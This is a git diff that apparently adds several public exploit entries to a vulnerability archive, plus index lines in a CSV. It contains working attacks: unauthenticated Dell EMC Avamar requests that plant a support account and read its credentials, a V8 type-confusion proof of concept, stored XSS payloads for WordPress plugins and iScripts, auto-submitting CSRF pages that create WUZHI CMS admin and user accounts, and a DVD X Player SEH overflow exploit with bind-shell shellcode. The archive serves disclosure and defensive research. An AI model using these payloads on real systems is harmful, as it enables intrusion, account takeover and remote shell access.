diff --git a/exploits/linux/webapps/44441.txt b/exploits/linux/webapps/44441.txt
new file mode 100644
index 000000000..763a193da
--- /dev/null
+++ b/exploits/linux/webapps/44441.txt
@@ -0,0 +1,143 @@
+# Exploit Title: [Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability (DSA-2018-025)]
+# Date: [24/11/2017]
+# Exploit Author: [SlidingWindow]
+# Vendor Homepage: [https://store.Dell EMC.com/en-us/AVAMAR-PRODUCTS/Dell-DELL EMC-Avamar-Virtual-Edition-Data-Protection-Software/p/DELL EMC-Avamar-Virtual-Edition]
+# Version: [Dell EMC Avamar Server 7.3.1 , Dell EMC Avamar Server 7.4.1, Dell EMC Avamar Server 7.5.0, Dell EMC Integrated Data Protection Appliance 2.0, Dell EMC Integrated Data Protection Appliance 2.1]
+# Tested on: [Dell EMC Avamar Virtual Edition version 7.5.0.183]
+# CVE : [CVE-2018-1217]
+
+==================
+#Product:-
+==================
+EMC Avamar Virtual Edition is great for enterprise backup data protection for small and medium sized offices. EMC Avamar Virtual Edition is optimized for backup and recovery of virtual and physical servers,enterprise applications,remote offices,and desktops or laptops.
+
+==================
+#Vulnerability:-
+==================
+Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability (DSA-2018-025)
+
+========================
+#Vulnerability Details:-
+========================
+
+=====================================================================================================================================================
+1. Missing functional level access control allows an unauthenticated user to add DELL EMC Support Account to the Installation Manager (CVE-2018-1217)
+=====================================================================================================================================================
+
+DELL EMC Avamar fails to restrict access to Configuration section that let Administrators set up Installation Manager configurations, or check for new packages from the Online Support site. An unauthenticated, remote attacker could add an Online Support Account for DELL EMC without any user interaction.
+
+#Proof-Of-Concept:
+------------------
+1. Send following request to the target:
+
+POST /avi/avigui/avigwt HTTP/1.1
+Host: <target_ip>
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: text/x-gwt-rpc; charset=utf-8
+X-GWT-Permutation: 8EGHBE4312AFBC12325324123DF4545A
+X-GWT-Module-Base: https://<target_ip>/avi/avigui/
+Referer: https://<target_ip>/avi/avigui.html
+Content-Length: 452
+Connection: close
+
+7|0|7|https://<target_ip>/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|saveLDLSConfig|java.lang.String/2004016611|<target_ip>|{"proxyHost":null, "proxyPort":0, "useProxyAuthentication":false, "proxyUsername":null, "proxyPassword":null, "disableInternetAccess":false, "proxyEnable":false, "emcsupportUsername":"hacker", "emcsupportPassword":"hacked3", "disableLDLS":false}|1|2|3|4|3|5|5|5|6|0|7|
+
+2. Log into Avamar Installation Manager and navigate to Configuration tab to make sure that the user 'hacker' was added successfully.
+
+
+=========================================================================================================================================================
+2. Missing functional level access control allows an unauthenticated user to retrieve DELL EMC Support Account Credentials in Plain Text (CVE-2018-1217)
+=========================================================================================================================================================
+
+DELL EMC Avamar fails to restrict access to Configuration section that let Administrators set up Installation Manager configurations, or check for new packages from the Online Support site. An unauthenticated, remote attacker could retrieve Online Support Account password in plain text.
+
+#Proof-Of-Concept:
+------------------
+1. Send following request to the target:
+
+POST /avi/avigui/avigwt HTTP/1.1
+Host: <target_ip>
+Connection: Keep-Alive
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: */*
+Content-Type: text/x-gwt-rpc; charset=utf-8
+X-GWT-Permutation: 3AF662C052F0EB9D3D51649D2293F6EC
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.5
+DNT: 1
+Content-Length: 192
+
+
+7|0|6|https://<target_ip>/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|getLDLSConfig|java.lang.String/2004016611|<target_ip>|1|2|3|4|2|5|5|6|0|
+
+2. Server returns credentials in plain text:
+
+HTTP/1.1 200 OK
+Date: Fri, 17 Nov 2017 10:46:31 GMT
+Server: Jetty(9.0.6.v20130930)
+Content-Type: application/json; charset=utf-8
+Content-Disposition: attachment
+Content-Length: 275
+Connection: close
+
+//OK[1,["{\"proxyHost\":null,\"proxyPort\":0,\"useProxyAuthentication\":false,\"proxyUsername\":\"\",\"proxyPassword\":\"\",\"disableInternetAccess\":false,\"proxyEnable\":false,\"emcsupportUsername\":\"hacker\",\"emcsupportPassword\":\"hacked3\",\"disableLDLS\":false}"],0,7]
+
+
+=========================================================================================================================================================
+3. Improper validation of ëDELL EMC Customer Support passcodeí allows an authenticated user to unlock DELL EMC Support Account and download verbose logs
+=========================================================================================================================================================
+
+DELL EMC Avamar fails to validate ëDELL EMC Customer Support passcodeí properly allowing an authenticated user to unlock the support account and view/download verbose logs. However, according to vendor, this one seems to be a vulnerability but it's an ambuious functionality instead.
+
+#Proof-Of-Concept:
+------------------
+1. Try to unlock the support account with an invalid password and you get error 'Customer Support Access Denied':
+2. Now send the same request again (with invalid password) and tamper the server response:
+
+Request:
+---------
+POST /avi/avigui/avigwt HTTP/1.1
+Host: <target_ip>
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: text/x-gwt-rpc; charset=utf-8
+X-GWT-Permutation: 3AF662C052F0EB9D3D51649D2293F6EC
+X-GWT-Module-Base: https://<target_ip>/avi/avigui/
+Referer: https://<target_ip>/avi/avigui.html
+Content-Length: 202
+Cookie: supo=x; JSESSIONID=9tt4unkdjjilbo072x4nji2y
+Connection: close
+
+7|0|7|https://<target_ip>/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|supportLogin|java.lang.String/2004016611|<target_ip>|1|2|3|4|3|5|5|5|6|0|7|
+
+
+Tampered response:
+--------------------
+HTTP/1.1 200 OK
+Date: Fri, 24Nov 2017 07:57:25 GMT
+Server: Jetty(9.0.6.v20130930)
+X-Frame-Options: SAMEORIGIN
+Content-Type: application/json; charset=utf-8
+Content-Disposition: attachment
+Content-Length: 21
+Connection: close
+
+//OK[1,["true"],0,7]
+
+3. This unlocks the support account and enabled the 'Log' download button.
+
+
+===================================
+#Vulnerability Disclosure Timeline:
+===================================
+
+11/2017: First email to disclose the vulnerability to EMC Security Response Team.
+12/2017: Vendor confirmed vulnerability#1 and vulnerability#3, and discarded vulnerability#3 stating that this is an ambigious functionaliy and not a vulnerability.
+12/2017: Vendor confirmed that the fix will be released in January 2018.
+01/2018: Vendor delayed the fix release stating that the Dell EMC IDPA is also vulnerable.0
+04/2018: Vendor assigned CVE-2018-1217 and pubished the advisory 'DSA-2018-025: Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability': http://seclists.org/fulldisclosure/2018/Apr/14
\ No newline at end of file
diff --git a/exploits/multiple/dos/44442.js b/exploits/multiple/dos/44442.js
new file mode 100644
index 000000000..f0d519e14
--- /dev/null
+++ b/exploits/multiple/dos/44442.js
@@ -0,0 +1,73 @@
+/*
+I think this commit has introduced the bug: https://chromium.googlesource.com/v8/v8.git/+/9884bc5dee488bf206655f07b8a487afef4ded9b
+
+Reduction LoadElimination::ReduceTransitionElementsKind(Node* node) {
+...
+     if (object_maps.contains(ZoneHandleSet<Map>(source_map))) {
+       object_maps.remove(source_map, zone());
+       object_maps.insert(target_map, zone());
+-      AliasStateInfo alias_info(state, object, source_map);
+-      state = state->KillMaps(alias_info, zone());
+-      state = state->AddMaps(object, object_maps, zone());
++      state = state->SetMaps(object, object_maps, zone());
+     }
+...
+}
+
+I think the "state->KillMaps(alias_info, zone());" was accidentally removed. This lack may lead CheckMap instructions to be removed incorrectly.
+
+A PoC demonstrating type confusion:
+*/
+
+function opt(a, b) {
+    b[0] = 0;
+
+    a.length;
+
+    // TransitionElementsKind
+    for (let i = 0; i < 1; i++)
+        a[0] = 0;
+
+    // CheckMap removed, type confusion
+    b[0] = 9.431092e-317;  // 0x1234567
+}
+
+let arr1 = new Array(1);
+arr1[0] = 'a';
+opt(arr1, [0]);
+
+let arr2 = [0.1];
+opt(arr2, arr2);
+
+%OptimizeFunctionOnNextCall(opt);
+
+opt(arr2, arr2);
+arr2[0].x  // access 0x1234566
+
+Without natives syntax:
+function opt(a, b) {
+    b[0] = 0;
+
+    a.length;
+
+    // TransitionElementsKind
+    for (let i = 0; i < 1; i++)
+        a[0] = 0;
+
+    b[0] = 9.431092e-317;  // 0x1234567
+
+    // Force optimization
+    for (let i = 0; i < 10000000; i++) {
+
+    }
+}
+
+let arr1 = new Array(1);
+arr1[0] = 'a';
+opt(arr1, [0]);
+
+let arr2 = [0.1];
+opt(arr2, arr2);
+
+opt(arr2, arr2);
+arr2[0].x  // access 0x1234566
\ No newline at end of file
diff --git a/exploits/php/webapps/44436.txt b/exploits/php/webapps/44436.txt
new file mode 100644
index 000000000..37292e999
--- /dev/null
+++ b/exploits/php/webapps/44436.txt
@@ -0,0 +1,31 @@
+# Exploit Title:  iScripts Easycreate 3.2.1 - Stored Cross-Site Scripting
+# Date: 02/04/2018
+# Exploit Author: ManhNho
+# Vendor Homepage: https://www.iscripts.com
+# Demo Page: https://www.demo.iscripts.com/easycreate/demo/
+# Version: 3.2.1
+# Tested on: Windows 10
+# Category: Webapps
+# CVE: CVE-2018-9236
+# CVE: CVE-2018-9237
+
+1. Description
+====================
+iScripts EasyCreate 3.2.1 has Stored Cross-Site Scripting in the "Site Description" and "Site Title" fields.
+
+2. PoC
+====================
+1. from "user section", access to "dashboard" and select "Created from saved items" with edit option
+2. In "edit site" action,  Inject "><script>alert('2')</script> to "Site Description" field
+3. Save and change!! refresh and we have alert pop up!
+
+3. PoC
+====================
+1. from "user section", access to "dashboard" and select "Created from saved items" with edit option
+2. In "edit site" action, Inject </title>"><script>alert('1')</script> to "Site title" field
+3. Save and change! refresh and we have alert pop up!
+
+4. References
+====================
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-9237
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-9236
\ No newline at end of file
diff --git a/exploits/php/webapps/44437.txt b/exploits/php/webapps/44437.txt
new file mode 100644
index 000000000..5876fb8c3
--- /dev/null
+++ b/exploits/php/webapps/44437.txt
@@ -0,0 +1,44 @@
+# Exploit Title : Activity Log Wordpress Plugin Stored Cross Site Scripting (XSS)
+# Date: 25-02-2018
+# Exploit Author : Stefan Broeder
+# Vendor Homepage: https://pojo.me
+# Software Link: https://wordpress.org/plugins/aryo-activity-log/
+# Version: 2.4.0
+# CVE : CVE-2018-8729
+# Category : webapps
+
+Description
+===========
+Activity Log is a WordPress plugin which tracks site activity. It has more than 70.000 active installations. Version 2.4.0 (and possibly the previous ones) are affected by several Stored XSS vulnerabilities.
+
+Vulnerable part of code
+=======================
+Storing the payload:
+File: aryo-activity-log/hooks/class-aal-hook-attachment.php:14. The log entry that is stored contains the result of get_the_title($post->ID), which can include HTML and is not sanitized by WordPress.
+File: aryo-activity-log/hooks/class-aal-hook-comments.php:14. The log entry that is stored contains the result of get_the_title($comment->comment_post_ID), which can include HTML and is not sanitized by WordPress.
+File: aryo-activity-log/hooks/class-aal-hook-posts.php:7. The log entry that is stored contains the result of $title = get_the_title($post), which can include HTML and is not sanitized by WordPress.
+
+Displaying the payload:
+File: aryo-activity-log/classes/class-aal-activity-log-list-table.php:209. $item->object_name is displayed without sanitization and can contain HTML tags.
+
+Impact
+======
+Arbitrary JavaScript code can be run on browser side if a user is able to create a post or upload an attachment.
+
+Exploitation
+============
+To successfully exploit this vulnerability, an attacker would have to perform any of the following:
+- Create/edit/draft/publish/trash/untrash a post with JavaScript in the title
+- Create/edit/trash/untrash/mark_as_spam/unmark_as_spam a comment on a post with JavaScript in the title
+- Add/edit/delete an attachment with JavaScript in the attachment title
+
+Regular website visitors will not have the capability to do any of these, however, possible threat actors might include:
+- A user with the role of ‘editor’ within WordPress (non-admins which are able to create content)
+- A rogue administrator among multiple administrators
+- A compromised plugin
+
+If the payload has been injected, then it will be executed once the Activity Log is viewed. This can possibly lead to stealing of CSRF nonces and creation of new (administrator) users on the WordPress instance.
+
+Solution
+========
+Update to 2.4.1
\ No newline at end of file
diff --git a/exploits/php/webapps/44439.txt b/exploits/php/webapps/44439.txt
new file mode 100644
index 000000000..d50cb20ab
--- /dev/null
+++ b/exploits/php/webapps/44439.txt
@@ -0,0 +1,42 @@
+# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add admin account
+# Date: 2018-04-10
+# Exploit Author: taoge
+# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
+# Software Link: https://github.com/wuzhicms/wuzhicms
+# Version: 4.1.0 
+# CVE : CVE-2018-9926
+ 
+An issue was discovered in WUZHI CMS 4.1.0.（https://github.com/wuzhicms/wuzhicms/issues/128）
+There is a CSRF vulnerability that can add an admin account via index.php?m=core&f=power&v=add.
+After the administrator logged in, open the csrf exp page.
+ 
+ 
+<html><body>
+<script type="text/javascript">
+function post(url,fields)
+{
+var p = document.createElement("form");
+p.action = url;
+p.innerHTML = fields;
+p.target = "_self";
+p.method = "post";
+document.body.appendChild(p);
+p.submit();
+}
+function csrf_hack()
+{
+var fields;
+
+
+fields += "<input type='hidden' name='form[role][]' value='1' />";
+fields += "<input type='hidden' name='form[username]' value='hack123' />";  
+fields += "<input type='hidden' name='form[password]' value='' />";  
+fields += "<input type='hidden' name='form[truename]' value='taoge@5ecurity' />";  
+
+
+var url = "http://127.0.0.1/www/index.php?m=core&f=power&v=add&&_su=wuzhicms&_menuid=61&_submenuid=62&submit=taoge";
+post(url,fields);
+}
+window.onload = function() { csrf_hack();}
+</script>
+</body></html>
\ No newline at end of file
diff --git a/exploits/php/webapps/44440.txt b/exploits/php/webapps/44440.txt
new file mode 100644
index 000000000..d82236c12
--- /dev/null
+++ b/exploits/php/webapps/44440.txt
@@ -0,0 +1,56 @@
+# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add user account
+# Date: 2018-04-10
+# Exploit Author: taoge
+# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
+# Software Link: https://github.com/wuzhicms/wuzhicms
+# Version: 4.1.0 
+# CVE : CVE-2018-9927
+ 
+An issue was discovered in WUZHI CMS 4.1.0.（https://github.com/wuzhicms/wuzhicms/issues/128）
+There is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add.
+After the administrator logged in, open the csrf exp page.
+ 
+ 
+<html><body>
+<script type="text/javascript">
+function post(url,fields)
+{
+var p = document.createElement("form");
+p.action = url;
+p.innerHTML = fields;
+p.target = "_self";
+p.method = "post";
+document.body.appendChild(p);
+p.submit();
+}
+function csrf_hack()
+{
+var fields;
+
+
+fields += "<input type='hidden' name='info[username]' value='hack123' />";
+fields += "<input type='hidden' name='info[password]' value='hacktest' />";  
+fields += "<input type='hidden' name='info[pwdconfirm]' value='hacktest' />";  
+fields += "<input type='hidden' name='info[email]' value='taoge@5ecurity.cn' />";  
+fields += "<input type='hidden' name='info[mobile]' value='' />";  
+fields += "<input type='hidden' name='modelids[]' value='10' />";  
+fields += "<input type='hidden' name='info[groupid]' value='3' />";  
+fields += "<input type='hidden' name='pids[]' value='0' />";  
+fields += "<input type='hidden' name='pids[]' value='0' />";  
+fields += "<input type='hidden' name='pids[]' value='0' />"; 
+fields += "<input type='hidden' name='pids[]' value='0' />";  
+fields += "<input type='hidden' name='avatar' value='' />";  
+fields += "<input type='hidden' name='islock' value='0' />"; 
+fields += "<input type='hidden' name='sys_name' value='0' />"; 
+fields += "<input type='hidden' name='info[birthday]' value='' />";  
+fields += "<input type='hidden' name='info[truename]' value='' />";  
+fields += "<input type='hidden' name='info[sex]' value='0' />"; 
+fields += "<input type='hidden' name='info[marriage]' value='0' />"; 
+
+
+var url = "http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=taoge";
+post(url,fields);
+}
+window.onload = function() { csrf_hack();}
+</script>
+</body></html>
\ No newline at end of file
diff --git a/exploits/php/webapps/44443.txt b/exploits/php/webapps/44443.txt
new file mode 100644
index 000000000..ccbabd88c
--- /dev/null
+++ b/exploits/php/webapps/44443.txt
@@ -0,0 +1,33 @@
+# Exploit Title: WordPress Plugin WordPress File Upload 4.3.2 - Stored XSS
+# Date: 31/03/2018
+# Exploit Author: ManhNho
+# Vendor Homepage: https://www.iptanus.com/
+# Software Link: https://downloads.wordpress.org/plugin/wp-file-upload.zip
+# Version: 4.3.2
+# Tested on: CentOS 6.5
+# CVE : CVE-2018-9172
+# Category : Webapps
+
+1. Description
+===========
+WordPress File Upload is a WordPress plugin with more than 20.000 active
+installations.
+Version 4.3.2 (and possibly previous versions) are affected by a Stored XSS
+vulnerability in the admin panel ,related to the "Uploader Instances"
+functionality.
+
+2. Proof of Concept
+===========
+
+1. Login to admin panel
+2. Access to Wordpress File Upload Control Panel. In Uploader Instances
+function, choose and edit created Instance
+3. In Plugin ID field, inject XSS pattern such as:
+<script>alert('ManhNho')</script> and click Update button
+4. Access to Pages/Posts contain upload option, we got alert ManhNho
+
+3. References
+===========
+https://www.iptanus.com/new-version-4-3-3-of-wordpress-file-upload-plugin/
+https://wordpress.org/plugins/wp-file-upload/#developers
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9172
\ No newline at end of file
diff --git a/exploits/php/webapps/44444.txt b/exploits/php/webapps/44444.txt
new file mode 100644
index 000000000..844a9f00c
--- /dev/null
+++ b/exploits/php/webapps/44444.txt
@@ -0,0 +1,107 @@
+# Exploit Title: WordPress Plugin WordPress File Upload 4.3.3 - Stored XSS
+# Date: 06/04/2018
+# Exploit Author: ManhNho
+# Vendor Homepage: https://www.iptanus.com/
+# Software Link: https://downloads.wordpress.org/plugin/wp-file-upload.zip
+# Version: 4.3.3
+# Tested on: Windows 7 / Cent OS 6.5
+# CVE : CVE-2018-9844
+# Category : Webapps
+
+Description
+===========
+WordPress File Upload is a WordPress plugin with more than 20.000 active
+installations.
+Version 4.3.3 (and possibly previous versions) are affected by a Stored XSS
+vulnerability in the admin panel ,related to the "Edit_Setting"
+functionality.
+
+
+PoC
+===============
+Request:
+
+POST /wp-admin/options-general.php?page=wordpress_file_upload&action=edit_settings
+HTTP/1.1
+Host: 192.168.1.66
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101
+Firefox/59.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.1.66/wp-admin/options-general.php?page=
+wordpress_file_upload&action=plugin_settings
+Content-Type: multipart/form-data; boundary=---------------------
+------27678165033834
+Content-Length: 906
+Cookie: wordpress_ce39b1fa1561a0e8d46e02ff9e65f6a0=admin%7C1523124759%
+7CYpPsz6ePz7L52pKrUk6uFioJlynhadnrSuv2lKQNhJe%7Ca3c7a75afaaf9ce1db3596b8aa83
+3adeb337f313ef5156fbf93096c1af0cdbbc; wp-settings-1=libraryContent%3Dbrowse;
+wp-settings-time-1=1522504284; PHPSESSID=o6smfv1u6p8rh7cu7v7gl9lm47;
+wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_
+ce39b1fa1561a0e8d46e02ff9e65f6a0=admin%7C1523124759%
+7CYpPsz6ePz7L52pKrUk6uFioJlynhadnrSuv2lKQNhJe%7C1993c93121805782b8bee82cd013
+6f1a6aa286d4294ed58cb6f95539acdfe5d5
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+-----------------------------27678165033834
+Content-Disposition: form-data; name="_wpnonce"
+
+c9d5733e36
+-----------------------------27678165033834
+Content-Disposition: form-data; name="_wp_http_referer"
+
+/wp-admin/options-general.php?page=wordpress_file_upload&
+action=plugin_settings
+-----------------------------27678165033834
+Content-Disposition: form-data; name="action"
+
+edit_settings
+-----------------------------27678165033834
+Content-Disposition: form-data; name="wfu_basedir"
+
+<script>alert('XSS')</script>
+-----------------------------27678165033834
+Content-Disposition: form-data; name="wfu_postmethod"
+
+fopen
+-----------------------------27678165033834
+Content-Disposition: form-data; name="wfu_admindomain"
+
+siteurl
+-----------------------------27678165033834
+Content-Disposition: form-data; name="submitform"
+
+Update
+-----------------------------27678165033834--
+
+Response:
+
+HTTP/1.1 200 OK
+Date: Thu, 05 Apr 2018 18:15:01 GMT
+Server: Apache/2.2.15 (CentOS)
+X-Powered-By: PHP/5.3.3
+Expires: Wed, 11 Jan 1984 05:00:00 GMT
+Cache-Control: no-cache, must-revalidate, max-age=0
+Pragma: no-cache
+X-Frame-Options: SAMEORIGIN
+Referrer-Policy: same-origin
+Connection: close
+Content-Type: text/html; charset=UTF-8
+Content-Length: 28623
+...
+
+<input name="wfu_basedir" id="wfu_basedir" type="text"
+value="<script>alert('XSS')</script>" />
+<p style="cursor: text; font-size:9px; padding: 0px; margin: 0px; width:
+95%; color: #AAAAAA;">Current value: <strong><script>alert('XSS')</
+script></strong></p>
+...
+
+
+References
+===============
+https://www.iptanus.com/new-version-4-3-4-of-wordpress-file-upload-plugin/
+https://wordpress.org/plugins/wp-file-upload/#developers
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9844
\ No newline at end of file
diff --git a/exploits/windows_x86/local/44438.txt b/exploits/windows_x86/local/44438.txt
new file mode 100644
index 000000000..3690a02ee
--- /dev/null
+++ b/exploits/windows_x86/local/44438.txt
@@ -0,0 +1,60 @@
+######################################################
+# Exploit Title: Buffer Overflow on DVD X Player Standard 5.5.3.9
+# Date: 29.03.2018
+# Vendor Homepage: http://www.dvd-x-player.com
+# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-
+# Standard.exe
+# Category: Local (SEH Based)
+# Exploit Credit: Prasenjit Kanti Paul
+# Web: http://hack2rule.wordpress.com/
+# Version: 5.5.3.9
+# Tested on: Windows XP SP3 x86
+# CVE: CVE-2018-9128
+######################################################
+
+# root@PKP:~# msfvenom -p windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 -b "\x00\x0a\x0d\x1a" -f python
+# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
+# No Arch selected, selecting Arch: x86 from the payload
+# x86/shikata_ga_nai chosen with final size 355
+# Payload size: 355 bytes
+# Final size of python file: 1710 bytes
+
+
+file = open("exploit_dvdx_player_standard_5.5.3.9.plf","w")
+buffer = "\x41" * 608
+next_seh = "\xeb\x06\x90\x90"
+seh = "\xBC\x13\x5F\x02" # pop/pop/ret : EchoDelayProcess.dll
+nops = "\x90" * 100
+
+buf = ""
+buf += "\xda\xd4\xd9\x74\x24\xf4\xb8\xb3\xb9\xc8\xae\x5a\x31"
+buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x13\x03\xf1\xaa\x2a"
+buf += "\x5b\x09\x24\x28\xa4\xf1\xb5\x4d\x2c\x14\x84\x4d\x4a"
+buf += "\x5d\xb7\x7d\x18\x33\x34\xf5\x4c\xa7\xcf\x7b\x59\xc8"
+buf += "\x78\x31\xbf\xe7\x79\x6a\x83\x66\xfa\x71\xd0\x48\xc3"
+buf += "\xb9\x25\x89\x04\xa7\xc4\xdb\xdd\xa3\x7b\xcb\x6a\xf9"
+buf += "\x47\x60\x20\xef\xcf\x95\xf1\x0e\xe1\x08\x89\x48\x21"
+buf += "\xab\x5e\xe1\x68\xb3\x83\xcc\x23\x48\x77\xba\xb5\x98"
+buf += "\x49\x43\x19\xe5\x65\xb6\x63\x22\x41\x29\x16\x5a\xb1"
+buf += "\xd4\x21\x99\xcb\x02\xa7\x39\x6b\xc0\x1f\xe5\x8d\x05"
+buf += "\xf9\x6e\x81\xe2\x8d\x28\x86\xf5\x42\x43\xb2\x7e\x65"
+buf += "\x83\x32\xc4\x42\x07\x1e\x9e\xeb\x1e\xfa\x71\x13\x40"
+buf += "\xa5\x2e\xb1\x0b\x48\x3a\xc8\x56\x05\x8f\xe1\x68\xd5"
+buf += "\x87\x72\x1b\xe7\x08\x29\xb3\x4b\xc0\xf7\x44\xab\xfb"
+buf += "\x40\xda\x52\x04\xb1\xf3\x90\x50\xe1\x6b\x30\xd9\x6a"
+buf += "\x6b\xbd\x0c\x06\x63\x18\xff\x35\x8e\xda\xaf\xf9\x20"
+buf += "\xb3\xa5\xf5\x1f\xa3\xc5\xdf\x08\x4c\x38\xe0\x32\x5f"
+buf += "\xb5\x06\x50\x4f\x90\x91\xcc\xad\xc7\x29\x6b\xcd\x2d"
+buf += "\x02\x1b\x86\x27\x95\x24\x17\x62\xb1\xb2\x9c\x61\x05"
+buf += "\xa3\xa2\xaf\x2d\xb4\x35\x25\xbc\xf7\xa4\x3a\x95\x6f"
+buf += "\x44\xa8\x72\x6f\x03\xd1\x2c\x38\x44\x27\x25\xac\x78"
+buf += "\x1e\x9f\xd2\x80\xc6\xd8\x56\x5f\x3b\xe6\x57\x12\x07"
+buf += "\xcc\x47\xea\x88\x48\x33\xa2\xde\x06\xed\x04\x89\xe8"
+buf += "\x47\xdf\x66\xa3\x0f\xa6\x44\x74\x49\xa7\x80\x02\xb5"
+buf += "\x16\x7d\x53\xca\x97\xe9\x53\xb3\xc5\x89\x9c\x6e\x4e"
+buf += "\xb7\x6d\xa2\x5b\x20\xd4\x57\x26\x2c\xe7\x82\x65\x49"
+buf += "\x64\x26\x16\xae\x74\x43\x13\xea\x32\xb8\x69\x63\xd7"
+buf += "\xbe\xde\x84\xf2"
+
+file.write(buffer + next_seh + seh + nops + buf)
+file.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b15603e15..36eb432f3 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5925,6 +5925,7 @@ id,file,description,date,author,type,platform,port
 44404,exploits/windows/dos/44404.html,"Microsoft Windows - Multiple Use-After-Free Issues in jscript Array Methods",2018-04-05,"Google Security Research",dos,windows,
 44427,exploits/multiple/dos/44427.txt,"WebKit - WebAssembly Parsing Does not Correctly Check Section Order",2018-04-09,"Google Security Research",dos,multiple,
 44428,exploits/linux/dos/44428.txt,"CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure",2018-04-09,"RedTeam Pentesting",dos,linux,
+44442,exploits/multiple/dos/44442.js,"Google Chrome V8 JIT - 'LoadElimination::ReduceTransitionElementsKind' Type Confusion",2018-04-10,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9640,6 +9641,7 @@ id,file,description,date,author,type,platform,port
 44422,exploits/java/local/44422.py,"H2 Database - 'Alias' Arbitrary Code Execution",2018-04-09,gambler,local,java,
 44423,exploits/windows/local/44423.py,"GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)",2018-04-09,bzyo,local,windows,
 44426,exploits/linux/local/44426.py,"PMS 0.42 - Local Stack-Based Overflow (ROP)",2018-04-09,"Juan Sacco",local,linux,
+44438,exploits/windows_x86/local/44438.txt,"DVD X Player Standard 5.5.3.9 - Buffer Overflow",2018-04-10,"Prasenjit Kanti Paul",local,windows_x86,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39132,3 +39134,10 @@ id,file,description,date,author,type,platform,port
 44433,exploits/php/webapps/44433.txt,"WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
 44434,exploits/php/webapps/44434.txt,"iScripts SonicBB 1.0 - Reflected Cross-Site Scripting",2018-04-09,ManhNho,webapps,php,
 44435,exploits/php/webapps/44435.txt,"WordPress Plugin Google Drive 2.2 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
+44436,exploits/php/webapps/44436.txt,"iScripts Easycreate 3.2.1 - Stored Cross-Site Scripting",2018-04-10,ManhNho,webapps,php,
+44437,exploits/php/webapps/44437.txt,"Wordpress Plugin Activity Log 2.4.0 - Stored Cross Site Scripting",2018-04-10,"Stefan Broeder",webapps,php,
+44439,exploits/php/webapps/44439.txt,"WUZHI CMS 4.1.0 - ‘Add Admin Account’ Cross-Site Request Forgery",2018-04-10,taoge,webapps,php,
+44440,exploits/php/webapps/44440.txt,"WUZHI CMS 4.1.0 - ‘Add User Account’ Cross-Site Request Forgery",2018-04-10,taoge,webapps,php,
+44441,exploits/linux/webapps/44441.txt,"Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control",2018-04-10,SlidingWindow,webapps,linux,
+44443,exploits/php/webapps/44443.txt,"WordPress File Upload Plugin 4.3.2 - Stored Cross Site Scripting",2018-04-10,ManhNho,webapps,php,
+44444,exploits/php/webapps/44444.txt,"WordPress Plugin WordPress File Upload 4.3.3 - Stored XSS",2018-04-10,ManhNho,webapps,php,